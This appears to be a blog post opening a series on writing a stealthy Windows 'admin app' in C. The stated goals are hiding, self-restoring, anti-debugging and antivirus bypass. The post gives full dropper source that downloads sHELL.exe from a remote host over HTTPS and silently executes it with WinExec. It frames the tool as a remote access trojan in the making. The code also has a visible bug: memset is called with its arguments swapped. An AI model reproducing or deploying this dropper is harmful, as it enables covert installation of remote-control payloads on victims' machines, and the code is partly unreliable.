Ever wanted a stealthy *Admin App 😉 that can hide itself? Restore itself? Update itself? Communicate without Eavesdroppers? Has anti debugging techniques? and can bypass common AV? Yea, me too. So we will build one in C, because C is also good to learn for pentesting, reversing, CTFs and much more. I am an experienced programmer but C is my weakest language so if I make n00b mistakes please tell me and help me out a little ❤

Dropper.c

I have had this code for years, served me well and was originally taken from a book called Advanced Persistent Threat Hacking which was quit good from what I remember.

What it does…

Housekeeping, like imports and definitions…

#define PTL "https"
#define DMN "10.10.10.10"
#define FLE "sHELL.exe"
#define CURL_STATICLIB
#include <stdio.h>
#include <curl/curl.h>

#include <file>

This variant is used for system header files. It searches for a file named file in a standard list of system directories.

#include "file"

This variant is used for header files of your own program. It searches for a file named file first in the directory containing the current file, then in the quote directories and then the same directories used for <file>.

Callback Function

We need to give curl a callback function, this is standard and defined in example docs like this: https://curl.haxx.se/libcurl/c/getinmemory.html

Ours is simple, sets up some variable then writes buffer to file…

size_t write_callback(void *buffer, size_t size, size_t nitems, void *userp){
FILE *file = (FILE*)userp;
size_t write;
write = fwrite(buffer, size, nitems, file);
return write;
}

Main

Here we first set up some variable again, then we concat some variables like PTL (protocol), DMN (domain) and FLE (file) to make the url we will request (https://10.10.10.10/sHELL.exe).

Then we use curl to get the file and save it with our callback, then we clean up like closing file handler and then we execute the file that was downloaded.

int main(void)
{
CURL *curl;
CURLcode res;
FILE *outFile;
outFile=fopen(FLE, "wb");
char finalURL[512];
memset(finalURL, sizeof(finalURL), '\0');
strcat( finalURL, PTL);
strcat( finalURL, "://");
strcat( finalURL, DMN);
strcat( finalURL, "/");
strcat( finalURL, FLE);
curl = curl_easy_init();

if(curl){
curl_easy_setopt(curl, CURLOPT_URL, finalURL);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, outFile);
res = curl_easy_perform(curl);
curl_easy_cleanup(curl);
fclose(outFile);
}
WinExec( FLE, 0 );
return 0;
}

This code is basic and could be improved a lot, some parts are also quite dated and super easy to detect so we will work on improving these parts in future BillyGates posts. Over time we will develop BillyGates into an effective undetectable remote admin app for Windows.int0x33/BillyGates
Billy Gates is an admin app for Windows xD. Contribute to int0x33/BillyGates development by creating an account on…github.com